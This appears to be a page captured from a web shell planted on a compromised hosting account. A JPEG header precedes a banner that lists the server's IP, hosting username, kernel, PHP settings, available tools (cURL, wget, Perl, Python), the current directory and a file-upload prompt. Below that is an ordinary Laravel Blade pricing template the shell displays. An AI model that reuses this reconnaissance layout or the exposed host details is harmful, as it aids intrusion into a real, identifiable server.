����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 18.217.13.162 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/./cbt.gltechlimited.com/resources/views/components/ |
Upload File : |
<section id="pricing" class="bg-gray-50 border-b border-gray-100"> <div class="max-w-7xl mx-auto py-12 px-4 sm:py-28 sm:px-6 lg:px-8"> <div class="lg:text-center"> <h2 class="text-base text-secondary font-semibold tracking-wide uppercase">{{ __('Pricing') }}</h2> <p class="mt-2 text-3xl leading-8 font-extrabold tracking-tight text-primary sm:text-4xl"> {{ $category['name'] }} {{ __('Subscription Plans') }} </p> <p class="mt-4 max-w-2xl text-lg text-gray-500 lg:mx-auto"> {{ __('To be paid as a one-time payment.') }} </p> </div> <div class="mt-16 flex flex-wrap items-center justify-center gap-6"> @foreach($plans as $plan) <x-plan :plan="$plan"/> @endforeach </div> </div> </section>